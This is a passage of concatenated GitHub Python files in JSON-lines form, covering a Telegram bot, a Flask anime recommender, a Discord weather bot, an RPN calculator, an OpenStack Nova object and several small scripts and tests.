storage.delete(b)\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Cwalker924/AirBnB_clone_v3","sub_path":"tests/test_models/test_engine/test_db_storage.py","file_name":"test_db_storage.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73844002067","text":"import asyncio\n\nfrom aiogram import Bot, Dispatcher\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\nfrom objects import globals\n\nfrom databases import Database\nfrom sqlalchemy import MetaData, create_engine\n\nfrom json import dumps, loads\n\nfrom os.path import isfile\n\nfrom loguru import logger\n\nasync def main():\n\n if not isfile(r\"config.json\"):\n with open(r\"config.json\", \"w\") as add_cfg:\n add_cfg.write(dumps(\n {\n \"token\":\"\", \n \"db_host\":\"\", \n \"db_name\":\"\",\n \"db_user\":\"\", \n \"db_password\":\"\", \n \"db_port\":5432\n }, indent=4\n ))\n add_cfg.close()\n \n with open(r\"config.json\", \"r\", encoding=\"utf-8\") as load_cfg:\n globals.config = loads(load_cfg.read())\n \n logger.info(\"Configuration loaded!\")\n\n #Telegram API\n globals.bot = Bot(token=globals.config[\"token\"], parse_mode=\"html\")\n globals.dp = Dispatcher(globals.bot, storage=MemoryStorage())\n\n #Database\n globals.db = Database(\"sqlite:///../_db/HH.sqlite\")\n globals.metadata = MetaData()\n\n globals.db_engine = create_engine(str(globals.db.url))\n globals.metadata.create_all(globals.db_engine)\n\n bot_info = await globals.bot.get_me()\n logger.info(f\"Start bot @{bot_info.username}\")\n\n import commands\n\n await globals.dp.start_polling()\n\nif __name__ == \"__main__\":\n try:\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n except KeyboardInterrupt:pass","repo_name":"amtp1/HH_Local","sub_path":"bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19000684430","text":"from multiagent.scenarios.arch.commons import *\nfrom multiagent.scenarios.simple_reference_3 import Scenario as S\n\n\nclass Scenario(S):\n def make_world(self):\n world = World()\n # set any world properties first\n world.dim_c = 2\n num_agents = 4\n num_landmarks = 4\n world.collaborative = True\n\n world_definition(world, num_agents, num_landmarks)\n\n self.reset_world(world)\n return world\n","repo_name":"enikon/MACP","sub_path":"multiagent/scenarios/arch/simple_reference_4.py","file_name":"simple_reference_4.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42814162295","text":"from visual import *\n\nfrom Bone import Bone\n\nsize = 12\nheight = 0\nwidth = 10\nvertical = 1\nhorizontal = 20\n\n# Create a instance with your size\nosso = Bone()\n\n# Set configs\nosso.setSize(size)\nosso.setPos(width, height)\nosso.rotate(vertical, horizontal)\n\n# And generate\nosso.generate()\n\n# To help, create a redpoint of reference\nsphere(pos=vector(0, 0, -1),\n radius=1,\n color=color.red)\n","repo_name":"wictorChaves/BoneVPython","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"75075304784","text":"ENDPOINTS = [\n \"BCF\",\n \"LogBCF\",\n \"BP\",\n \"LogP\",\n \"MP\",\n \"VP\",\n \"LogVP\",\n \"WS\",\n \"AOH\",\n \"BioDeg\",\n \"RB\",\n \"ReadyBiodeg\",\n \"HL\",\n \"LogHL\",\n \"KM\",\n \"LogKM\",\n \"KOA\",\n \"Koc\",\n \"LogKoc\",\n \"RT\",\n \"pKa\",\n \"LogD\",\n \"CERAPP\",\n \"ER\",\n \"CoMPARA\",\n \"AR\",\n \"CATMoS\",\n \"AcuteTox\",\n]\nALL_ENDPOINTS_PARAMETIZED = [([endpoint]) for endpoint in ENDPOINTS]\nSAMPLE_OF_ENDPOINTS_TOGETHER = [\n ENDPOINTS[0],\n ENDPOINTS[5],\n ENDPOINTS[8],\n ENDPOINTS[10],\n ENDPOINTS[14],\n]\n","repo_name":"cabreratoxy/pyOPERA","sub_path":"tests/test_opera/test_helpers/test_parameters.py","file_name":"test_parameters.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15520335535","text":"import os\nfrom flask import Flask, jsonify, abort, make_response, request, url_for, render_template\nfrom content_based_q import preprocess, vectorize_similarity, vectorize_similarity2, get_recommendations_both, anime_df, anime_new\nfrom genre_recommender import get_genre_recommendations, data_scored\nfrom flask_cors import CORS\n\n\napp = Flask(__name__, static_folder=\"frontend/anime-ui/build\", static_url_path=\"/\")\ncors = CORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\n\n@app.route('/') \ndef index():\n return app.send_static_file('index.html')\n\n@app.route('/recommender', methods=['GET', 'POST'])\ndef recommend():\n try:\n if request.method == 'POST':\n anime = request.get_json()['anime'].lower().strip()\n cos_sim1 = vectorize_similarity(anime_df['Synopsis'])\n cos_sim2 = vectorize_similarity2(anime_df['soup'])\n preds = get_recommendations_both(anime,cos_sim1,cos_sim2).values.tolist()\n preds = {i:preds[i] for i in range(len(preds))}\n return jsonify(preds) \n except KeyError:\n abort(404)\n\n@app.route('/recommender/genre', methods=['GET', 'POST'])\ndef recommend_genre():\n if request.method == 'POST':\n anime_genre = request.get_json()['genre']\n print(\"worked\") # for debugging\n \n preds = get_genre_recommendations(anime_genre).tolist()\n preds = {i:preds[i] for i in range(len(preds))}\n return jsonify(preds)\n\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error':'Anime not found (try their japanese/english names )'}), 404)\n \n\n\nif __name__ == '__main__':\n # app.run(debug=True) # development mode\n app.run(host='0.0.0.0', debug=False, port=80) # production mode","repo_name":"Pydare/Anime-Recommender-System","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"42348829872","text":"import logging\nfrom http import HTTPStatus\n\nimport requests\nfrom bs4 import BeautifulSoup as bs\n\n\ndef make_int(text: str):\n text = text.replace(' ', '')\n text = text.replace('₽', '')\n text = text.replace('к', '')\n return int(text)\n\n\ndef make_float(text: str):\n text = text.replace(' ', '')\n text = text.replace('₽', '')\n text = text.replace('к', '')\n return float(text)\n\n\ndef make_bool(text):\n if text:\n return True\n return False\n\n\nparse_classes = [\n {\n 'name': 'server',\n 'block': 'div',\n 'class': 'tc-server'\n },\n {\n 'name': 'seller',\n 'block': 'div',\n 'class': 'media-user-name'\n },\n {\n 'name': 'item_name',\n 'block': 'div',\n 'class': 'tc-desc-text'\n },\n {\n 'name': 'amount',\n 'block': 'div',\n 'class': 'tc-amount',\n 'func': make_int\n },\n {\n 'name': 'price',\n 'block': 'div',\n 'class': 'tc-price',\n 'func': make_float\n },\n {\n 'name': 'online',\n 'block': 'div',\n 'class': 'online',\n 'func': make_bool\n }\n]\n\n\ndef parse_info(link):\n answer = requests.get(link)\n if answer.status_code == HTTPStatus.OK:\n logging.debug('Ответ от сайта получен')\n soup = bs(answer.text, \"html.parser\")\n items = soup.find_all('a', class_='tc-item')\n data = []\n if items:\n logging.debug('Данные отсортированы')\n for item in items:\n item_data = {}\n for parse_classe in parse_classes:\n item_data[parse_classe['name']] = None\n info = item.find(parse_classe['block'],\n class_=parse_classe['class'])\n if info:\n info = info.text.strip()\n if 'func' in parse_classe:\n info = parse_classe['func'](info)\n item_data[parse_classe['name']] = info\n item_data['link'] = item['href']\n data.append(item_data)\n return data\n","repo_name":"oupsfed/funpay_bot","sub_path":"funpay_bot/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71385834705","text":"'''Find all the palindromes in a list of words'''\nimport load_dictionary\n\ndef find_palindromes() -> list:\n words = load_dictionary.load(\"words.txt\")\n palindromes = []\n for word in words:\n # single letters aren't really palindromes\n if len(word) > 1 and word == word[::-1]:\n palindromes.append(word)\n print(f\"\\nNumber of palindromes found = {len(palindromes)}\\n\")\n print(*palindromes, sep='\\n')\n return palindromes\n","repo_name":"adubois85/python_projects","sub_path":"impractical_python/chapter_02/palindromes.py","file_name":"palindromes.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28561358617","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo_config import cfg\nfrom oslo_log import log as logging\nfrom oslo_serialization import jsonutils\nimport six\nfrom sqlalchemy.orm import joinedload\n\nfrom nova.db.sqlalchemy import api as db\nfrom nova.db.sqlalchemy import api_models\nfrom nova import exception\nfrom nova.i18n import _LE\nfrom nova import objects\nfrom nova.objects import base\nfrom nova.objects import fields\n\nCONF = cfg.CONF\nLOG = logging.getLogger(__name__)\n\nOBJECT_FIELDS = ['info_cache', 'security_groups']\nJSON_FIELDS = ['instance_metadata']\nIP_FIELDS = ['access_ip_v4', 'access_ip_v6']\n\n\n@base.NovaObjectRegistry.register\nclass BuildRequest(base.NovaObject):\n # Version 1.0: Initial version\n VERSION = '1.0'\n\n fields = {\n 'id': fields.IntegerField(),\n 'project_id': fields.StringField(),\n 'user_id': fields.StringField(),\n 'display_name': fields.StringField(nullable=True),\n 'instance_metadata': fields.DictOfStringsField(nullable=True),\n 'progress': fields.IntegerField(nullable=True),\n 'vm_state': fields.StringField(nullable=True),\n 'task_state': fields.StringField(nullable=True),\n 'image_ref': fields.StringField(nullable=True),\n 'access_ip_v4': fields.IPV4AddressField(nullable=True),\n 'access_ip_v6': fields.IPV6AddressField(nullable=True),\n 'info_cache': fields.ObjectField('InstanceInfoCache', nullable=True),\n 'security_groups': fields.ObjectField('SecurityGroupList'),\n 'config_drive': fields.BooleanField(default=False),\n 'key_name': fields.StringField(nullable=True),\n 'locked_by': fields.EnumField(['owner', 'admin'], nullable=True),\n 'request_spec': fields.ObjectField('RequestSpec'),\n # NOTE(alaski): Normally these would come from the NovaPersistentObject\n # mixin but they're being set explicitly because we only need\n # created_at/updated_at. There is no soft delete for this object.\n # These fields should be carried over to the instance when it is\n # scheduled and created in a cell database.\n 'created_at': fields.DateTimeField(nullable=True),\n 'updated_at': fields.DateTimeField(nullable=True),\n }\n\n def _load_request_spec(self, db_spec):\n self.request_spec = objects.RequestSpec._from_db_object(self._context,\n objects.RequestSpec(), db_spec)\n\n def _load_info_cache(self, db_info_cache):\n self.info_cache = objects.InstanceInfoCache.obj_from_primitive(\n jsonutils.loads(db_info_cache))\n\n def _load_security_groups(self, db_sec_group):\n self.security_groups = objects.SecurityGroupList.obj_from_primitive(\n jsonutils.loads(db_sec_group))\n\n @staticmethod\n def _from_db_object(context, req, db_req):\n for key in req.fields:\n if isinstance(req.fields[key], fields.ObjectField):\n try:\n getattr(req, '_load_%s' % key)(db_req[key])\n except AttributeError:\n LOG.exception(_LE('No load handler for %s'), key)\n elif key in JSON_FIELDS and db_req[key] is not None:\n setattr(req, key, jsonutils.loads(db_req[key]))\n else:\n setattr(req, key, db_req[key])\n req.obj_reset_changes()\n req._context = context\n return req\n\n @staticmethod\n @db.api_context_manager.reader\n def _get_by_instance_uuid_from_db(context, instance_uuid):\n db_req = (context.session.query(api_models.BuildRequest)\n .options(joinedload('request_spec'))\n .filter(\n api_models.RequestSpec.instance_uuid == instance_uuid)\n ).first()\n if not db_req:\n raise exception.BuildRequestNotFound(uuid=instance_uuid)\n return db_req\n\n @base.remotable_classmethod\n def get_by_instance_uuid(cls, context, instance_uuid):\n db_req = cls._get_by_instance_uuid_from_db(context, instance_uuid)\n return cls._from_db_object(context, cls(), db_req)\n\n @staticmethod\n @db.api_context_manager.writer\n def _create_in_db(context, updates):\n db_req = api_models.BuildRequest()\n db_req.update(updates)\n db_req.save(context.session)\n # NOTE: This is done because a later access will trigger a lazy load\n # outside of the db session so it will fail. We don't lazy load\n # request_spec on the object later because we never need a BuildRequest\n # without the RequestSpec.\n db_req.request_spec\n return db_req\n\n def _get_update_primitives(self):\n updates = self.obj_get_changes()\n for key, value in six.iteritems(updates):\n if key in OBJECT_FIELDS and value is not None:\n updates[key] = jsonutils.dumps(value.obj_to_primitive())\n elif key in JSON_FIELDS and value is not None:\n updates[key] = jsonutils.dumps(value)\n elif key in IP_FIELDS and value is not None:\n # These are stored as a string in the db and must be converted\n updates[key] = str(value)\n req_spec_obj = updates.pop('request_spec', None)\n if req_spec_obj:\n updates['request_spec_id'] = req_spec_obj.id\n return updates\n\n @base.remotable\n def create(self):\n if self.obj_attr_is_set('id'):\n raise exception.ObjectActionError(action='create',\n reason='already created')\n\n updates = self._get_update_primitives()\n db_req = self._create_in_db(self._context, updates)\n self._from_db_object(self._context, self, db_req)\n\n @staticmethod\n @db.api_context_manager.writer\n def _destroy_in_db(context, id):\n context.session.query(api_models.BuildRequest).filter_by(\n id=id).delete()\n\n @base.remotable\n def destroy(self):\n self._destroy_in_db(self._context, self.id)\n","repo_name":"BU-NU-CLOUD-SP16/Trusted-Platform-Module-nova","sub_path":"nova/objects/build_request.py","file_name":"build_request.py","file_ext":"py","file_size_in_byte":6500,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"39997923283","text":"'''\nPandigital prime\nProblem 41\nWe shall say that an n-digit number is pandigital if it makes use of all the digits 1 to n exactly once. For example, 2143 is a 4-digit pandigital and is also prime.\n\nWhat is the largest n-digit pandigital prime that exists? '''\n\nfrom math import sqrt\n\nmaxp = 0\nprimes = [2, 3, 5, 7]\n\n\ndef gen_all(a):\n p = []\n\n if a == 2:\n return ['12', '21']\n s = str(a)\n pp = gen_all(a - 1)\n for i in pp:\n for j in range(a):\n pi = i[:j] + s + i[j:]\n p.append(pi)\n return p\n\n\ndef gen_pand_pc(a):\n p = []\n if a > 9:\n return p\n n = int(a * (a + 1) / 2)\n if n % 3 == 0:\n return p\n s = str(a)\n #li = list(range(a,0,-1))\n pp = gen_all(a - 1)\n for i in pp:\n for j in range(a):\n pi = i[:j] + s + i[j:]\n if pi[-1] not in ['2', '4', '5', '6', '8']:\n p.append(int(pi))\n return p\n\n\ndef is_prime(a):\n b = int(sqrt(a)) + 1\n for p in primes:\n if a % p == 0:\n return False\n break\n if p > b:\n return True\n return True\n\n\nmaxi = 7654321\nlim = int(sqrt(maxi)) + 1\n\nfor i in range(9, lim, 2):\n if is_prime(i):\n primes.append(i)\n\nprint(\"Step one complete . # = \", len(primes))\n\np = gen_pand_pc(7)\nprint(\"all comb for 7 generated , # =\", len(p))\n\nfor i in p:\n ii = int(i)\n if is_prime(ii):\n maxp = max(ii, maxp)\n # print(ii)\nprint(\"Final = \", maxp)\n\n# print(gen_all(3))\n","repo_name":"murli777/Project-Euler-Solutions","sub_path":"src/001-050/P041-Panigital_Prime.py","file_name":"P041-Panigital_Prime.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7059257811","text":"import discord\nimport random\n\ncolor= 0xAD91FF\n\ndef intro():\n message=\"\"\"\n Meow! \n Welcome, welcome! I'm Weather Cat, and I'm here to make your day a whole lot better! With my expertise in weather forecasting, you'll never have to worry about stepping out unprepared for the elements. I'll let you know if it's going to be a sunny day, a rainy one, or if you need to pack an umbrella and some boots.\n\n But that's not all I can do! I'm also an expert in **air quality index prediction**, so you can always breathe easy knowing you're getting accurate information about the air you're breathing.\n\n And if you ever find yourself feeling lonely or in need of some company, don't worry, because I'm always here for you. My **Cat GPT integration** means we can have a chat anytime you want!\n\n So, let's make your day purr-fect together! With Weather Cat by your side, you'll always be prepared for whatever the day brings, and you'll never be alone.\n \"\"\"\n \n return discord.Embed(\n title='Hello friend',\n description=message,\n color=color\n )\n \ndef gpt():\n choice=[\n \"https://media.tenor.com/7JbbkdTGA38AAAAS/cute-cat.gif\",\n \"https://media.tenor.com/pONKfKjvep4AAAAS/cat-shocked.gif\",\n \"https://media.tenor.com/PS9Tcg6mIY4AAAAS/cat-ayasan.gif\",\n \"https://media.tenor.com/Ro5LGkOGGS0AAAAC/cat-catdriving.gif\",\n \"https://media.tenor.com/fWXyb86dSWMAAAAC/ok-cat.gif\",\n \"https://media.tenor.com/cNJNNhr8LQMAAAAM/cutecat-cute.gif\",\n \"https://media.tenor.com/cNJNNhr8LQMAAAAM/cutecat-cute.gif\",\n \"https://media.tenor.com/z0quuGfwH8AAAAAM/cat-sad.gif\"\n \"https://media.tenor.com/1SMrekR7KgQAAAAM/cat-angry.gif\",\n \"https://media.tenor.com/jMlNorWmapUAAAAS/echonomical-echosystem.gif\",\n \"https://media.tenor.com/ngXBmaiDqssAAAAS/cat-kitty.gif\",\n \"https://media.tenor.com/ngXBmaiDqssAAAAS/cat-kitty.gif\",\n \"https://media.tenor.com/ngXBmaiDqssAAAAS/cat-kitty.gif\",\n \"https://media.tenor.com/ngXBmaiDqssAAAAS/cat-kitty.gif\",\n \"https://media.tenor.com/ngXBmaiDqssAAAAS/cat-kitty.gif\",\n \"https://media.tenor.com/lPuo1Txt2vEAAAAS/huh-scare.gif\"\n ]\n return [\"meow \"*random.randint(5,50), choice[random.randint(0,len(choice)-1)]]\n\ndef helpM():\n message= discord.Embed(\n title='Cat\\'s here to help',\n color=color\n )\n message.add_field(\n name=\"Prefix\",\n value=\"`!cat`\",\n inline=False\n )\n message.add_field(\n name=\"About Me\",\n value=\"`hi`\",\n inline=True\n )\n message.add_field(\n name=\"Help!\",\n value=\"`help`\",\n inline=True\n )\n message.add_field(\n name=\"Weather Condition\",\n value=\"`weather`\",\n inline=False\n )\n message.add_field(\n name=\"Air Quality Index\",\n value=\"`AQI`\",\n inline=True\n )\n message.add_field(\n name=\"Plan My Trip\",\n value=\"`PMT`\",\n inline=True\n )\n message.add_field(\n name=\"Cat GPT\",\n value=\"`gpt`\",\n inline=False\n )\n \n return message\n\n\ndef help(message):\n if(message.lower()==\"hi\"):\n message=discord.embeds(\n title=message.title(),\n desciption=\"\"\"\n You can learn more about me with this command!\n usage: `!cat hi`\n \"\"\",\n color=color\n )\n return message\n elif(message.lower()==\"help\"):\n return discord.embeds(\n title=message.title(),\n desciption=\"\"\"\n learn about all the commands!\n usage: `!cat help [command name](optional)`\n \"\"\",\n color=color\n )\n elif(message.lower()==\"weather\"):\n return discord.embeds(\n title=message.title(),\n desciption=\"\"\"\n Current weather condition and more!\n usage: `!cat weather [Place Name]`\n \"\"\",\n color=color\n )\n elif(message.lower()==\"AQI\"):\n return discord.embeds(\n title=message.title(),\n desciption=\"\"\"\n learn about current Air Quality Index!\n usage: `!cat aqi [place name]`\n \"\"\",\n color=color\n )\n elif(message.lower()==\"pmt\"):\n return discord.embeds(\n title=message.title(),\n desciption=\"\"\"\n within the next 7 days, let me check if the date is good for your event!\n usage: `!cat pmt [DD-MM]`\n \"\"\",\n color=color\n )\n elif(message.lower()==\"gpt\"):\n return discord.embeds(\n title=message.title(),\n desciption=\"\"\"\n The most advanced version of CAT GPT!\n usage: `!cat gpt [your question]`\n \"\"\",\n color=color\n )\n else:\n return discord.embeds(\n title=message.title(),\n desciption=\"\"\"\n Sorry didn't understand that command.\n Use `help` to get list of all commands.\n \"\"\",\n color=color\n )","repo_name":"D3FaltXD/Weather-Cat","sub_path":"messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":5125,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"6264029311","text":"#!/usr/bin/env python3\n# a reverse polish notation calculator\n# for more info, see github.com/qguv/rpcalc\n\nimport math\nfrom rpcalc.stack import Stack\nfrom rpcalc.inout import clear\n\n# Getch operations\nfrom rpcalc.inout import getch as rawGetch\ndef getch():\n rawChar = rawGetch()\n if rawChar == 'Q': # naive escape\n clear()\n print(\"bye.\")\n exit()\n else:\n inpChar = rawChar\n return inpChar\n\n# operator management functions\nimport rpcalc.operators as ops\n\ndef getArgReq(symbol):\n return ops.bindings[symbol][1]\n\ndef operate(symbol, stack):\n '''\n Takes a symbol and a stack, performs the associated\n operation on the stack, and returns any errors.\n '''\n if stack.canOperate(getArgReq(symbol)):\n fn = ops.bindings[symbol][0] # get operation fn name\n try:\n return fn(stack) # absolute magic\n except (OverflowError, KeyboardInterrupt):\n return \"answer too large to compute!\"\n else:\n return \"too few entries for \" + symbol + \"!\"\n\ndef isNum(string):\n '''\n Tests whether a string can be converted to a float.\n Output is boolean.\n '''\n try:\n null = float(string)\n except ValueError:\n return False\n else:\n return True\n\ndef showCalc(stack, buf, errors):\n '''\n If there are errors, display those.\n Then show the \"screen\" of the calculator.\n '''\n clear()\n nonErrors = { '', None, '\\n' }\n if errors not in nonErrors:\n print(errors)\n stack.rpnView(buf) # correct view for HP calcs\n\ndef showStack(stack, buf):\n clear()\n try:\n print(stack)\n except KeyboardInterrupt:\n clear()\n print('too large to display!')\n stack.rpnView(buf)\n\ndef operHandler(stack, buf):\n operBuf = buf[-1] # initialize operator buffer\n buf = buf[:-1] # only keep numbers in buffer now\n while operBuf not in ops.bindings.keys(): # side loop\n operBuf += getch()\n if (operBuf[0] == 'e') and (operBuf[-1] in \\\n {str(i) for i in range(10)} | {\"+\",\"-\"}):\n # if e is being used as a power of ten handler\n buf = buf + operBuf # reunite buffer and move on\n operBuf = ''\n return (buf,'',False)\n if not any(operBuf in s for s in ops.bindings.keys()):\n if len(buf) != 0: # if there are any numbers to enter\n stack.push(float(buf))\n operBuf = ''\n return ('','not an operator! type ? for help.',False)\n else:\n if len(buf) != 0: # if there are any numbers to enter\n stack.push(float(buf))\n newErrors = operate(operBuf, stack)\n operBuf = ''\n if newErrors is None:\n return ('','',False)\n else:\n return ('',newErrors,False)\n\ndef keyHandler(stack, buf, errors):\n '''\n A series of tests for the most recent buffer entry.\n Keys tested are: return, backspace, p\n Sequences tested are: operators, numbers\n '''\n if buf[-1] == '\\r': # return\n if len(buf) == 1: # if there aren't any numbers to enter\n if len(stack) != 0: # if there is an x\n ops.DupX(stack) # duplicate x\n return ('','',False)\n else:\n stack.push(float(0))\n return ('','',False)\n else: # put number in stack\n try:\n stack.push(float(buf[:-1]))\n except (TypeError, ValueError):\n return ('',\"not a number!\",False)\n else:\n return ('','',False)\n elif ( buf[-1] == '\\x08' ) or \\\n ( buf[-1] == '\\x7f' ) or \\\n ( buf[-1] == '\\b' ): # handling backspace\n return (buf[:-2],'',False)\n elif buf == 'p': # Special \"print\" operator\n return ('','',True)\n elif any( s.startswith(buf[-1]) for s in ops.bindings.keys() ):\n # character just inserted is at least a partial operator\n return operHandler(stack, buf)\n elif (buf[-1] == 'e') and (not isNum(buf[:-1])):\n return ('','not an operator! type ? for help.',False)\n elif buf[-1] not in ({str(i) for i in range(10)} | {\".\",\"e\"}):\n return ('','not an operator! type ? for help.',False)\n else:\n return (buf,'',False)\n\n# the big guns\ndef workLoop(stack, buf, errors, printFlag): # fifth re-write!\n '''\n Runs the main loop for an individual stack.\n Stack-switching can be implemented in the future with another\n function which is called by main() and calls this function.\n '''\n while True:\n if printFlag: #TODO: this is really ugly\n # replaces normal print with a view of the stack\n showStack(stack, buf)\n printFlag = False\n else:\n showCalc(stack, buf, errors)\n errors = ''\n buf += getch() # reads input from user without enter key\n buf, errors, printFlag = keyHandler(stack, buf, errors)\n\n# DO IT #\nif __name__ == \"__main__\":\n stack = Stack([], 'stack view', limit=limit)\n buf, errors, printFlag = '', '', False\n if values:\n for n in values:\n stack.push(n)\n workLoop(stack, buf, errors, printFlag)\n","repo_name":"qguv/rpcalc","sub_path":"rpcalc/rpn.py","file_name":"rpn.py","file_ext":"py","file_size_in_byte":5288,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"12089081739","text":"from framework.lwm2m.tlv import TLVType\nfrom framework.lwm2m_test import *\n\n\nclass SecurityObjectDmOperationsBySingleServer(test_suite.Lwm2mSingleServerTest,\n test_suite.Lwm2mDmOperations):\n def runTest(self):\n # Every security instance action on nonexistent instance shall return NOT_AUTHORIZED to not disclose\n # any information.\n for i in range(3):\n self.read_instance(server=self.serv, oid=OID.Security, iid=i,\n expect_error_code=coap.Code.RES_UNAUTHORIZED)\n self.delete_instance(server=self.serv, oid=OID.Security, iid=i,\n expect_error_code=coap.Code.RES_UNAUTHORIZED)\n self.write_instance(server=self.serv, oid=OID.Security, iid=i,\n expect_error_code=coap.Code.RES_UNAUTHORIZED)\n self.execute_resource(server=self.serv, oid=OID.Security, iid=i, rid=1,\n expect_error_code=coap.Code.RES_UNAUTHORIZED)\n self.write_attributes(server=self.serv, oid=OID.Security, iid=i, rid=1,\n query=['pmax=1'], expect_error_code=coap.Code.RES_UNAUTHORIZED)\n\n\n","repo_name":"ETCorp/morpheus-examples","sub_path":"Anjay/test/integration/suites/default/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32412080095","text":"import MySQLdb\nimport MySQLdb.cursors as cursors\nimport pandas\n\nfrom data.objects import DataFrame, DataPool\n\n\nclass Connector(object):\n rep = None\n cfg_mysql = None\n conn = None\n\n def __init__(self, replacement):\n self.rep = replacement\n self.cfg_mysql = replacement\n\n def open_conn(self):\n self.conn = MySQLdb.connect(host=self.cfg_mysql['host'],\n port=self.cfg_mysql['port'],\n user=self.cfg_mysql['user'],\n passwd=self.cfg_mysql['password'],\n db=self.cfg_mysql['database'],\n cursorclass=cursors.SSCursor)\n\n def close_conn(self):\n self.conn.close()\n\n def get_feature_ids(self, selected_feature_table):\n cursor = self.conn.cursor()\n\n sql = \"SELECT DISTINCT(feature_id) AS id, \" \\\n \"(SELECT feature_name FROM {0}.feature_info WHERE {0}.feature_info.feature_id = id)\" \\\n \"FROM {0}.{1} WHERE feature_id > 1\" \\\n .format(self.cfg_mysql['database'], selected_feature_table)\n cursor.execute(sql)\n data = cursor.fetchall()\n feature_id_frame = DataFrame(data, ['feature_id', 'feature_name'])\n cursor.close()\n self.conn.commit()\n return feature_id_frame\n\n def save_feature_frame(self, selected_feature_table, selected_feature_ids, selected_feature_names):\n frame_pool = DataPool()\n frames = []\n keys = ['user_id', 'feature_week']\n for i in range(len(selected_feature_ids)):\n cursor = self.conn.cursor()\n feature_description = '[{}] {}'.format(str(selected_feature_ids[i]).zfill(3), selected_feature_names[i])\n sql = \"SELECT user_id, feature_week, feature_value FROM {0}.{1} WHERE feature_id = {2}\" \\\n .format(self.cfg_mysql['database'], selected_feature_table, selected_feature_ids[i])\n cursor.execute(sql)\n data = cursor.fetchall()\n feature_frame = DataFrame(data, keys + [feature_description])\n frames.append(feature_frame)\n cursor.close()\n matched = frames[0]\n for i in range(1, len(frames)):\n matched = pandas.merge(matched, frames[i], on=keys, how='outer')\n matched = DataFrame(frame=matched)\n cursor = self.conn.cursor()\n sql = \"SELECT user_id, feature_week, feature_value FROM {0}.{1} WHERE feature_id = 1\" \\\n .format(self.cfg_mysql['database'], selected_feature_table)\n cursor.execute(sql)\n data = cursor.fetchall()\n dropout_frame = DataFrame(data, keys + ['dropout'])\n cursor.close()\n matched = pandas.merge(matched, dropout_frame, on=keys, how='right')\n matched = DataFrame(frame=matched)\n frame_pool.save(matched)\n self.conn.commit()\n return True\n","repo_name":"MOOC-Learner-Project/MOOC-Learner-Modeled","sub_path":"data/connector.py","file_name":"connector.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16652279467","text":"import os\nimport os.path as osp\nfrom vectorrvnn.trainutils import Options\n\ndef test_options () :\n chdir = osp.split(osp.abspath(__file__))[0]\n opts = Options().parse(testing=[\n '--dataroot',\n osp.join(\n chdir,\n '../../data/Toy'\n ),\n '--name', \n 'test',\n '--n_epochs',\n '1',\n '--batch_size',\n '64',\n '--raster_size',\n '128',\n '--train_epoch_length',\n '256',\n '--val_epoch_length',\n '256'\n ])\n assert True\n","repo_name":"Vrroom/vectorrvnn","sub_path":"tests/trainutils/test_options.py","file_name":"test_options.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"38558665602","text":"\n\nclass Coords:\n x = 0\n y = 0\n\n def __init__(self, x, y):\n self.x = int(x)\n self.y = int(y)\n\n def __eq__(self, other):\n return self.x == other.x and self.y == other.y\n\n def __hash__(self):\n return hash(tuple([self.x, self.y]))\n\n\ndef _process_current_sentence(sentence: dict):\n if sentence:\n pairwise_agr = []\n pairwise_list = list(zip(list(sentence.keys()), list(sentence.keys())[1:]))\n for team1, team2 in pairwise_list:\n overlap_count = len(sentence[team1].intersection(sentence[team2]))\n union_count = len(sentence[team1].union(sentence[team2]))\n pairwise_agr.append(overlap_count / float(union_count))\n pairs_len = len(pairwise_agr)\n if pairs_len == 0:\n return None\n else:\n return sum(pairwise_agr) / pairs_len\n else:\n return None\n\n\nif __name__ == \"__main__\":\n agreement = []\n sentence_count = 0\n # with open('./data/test.m2', 'r') as inp:\n with open('./data/official-2014.combined-withalt.m2', 'r') as 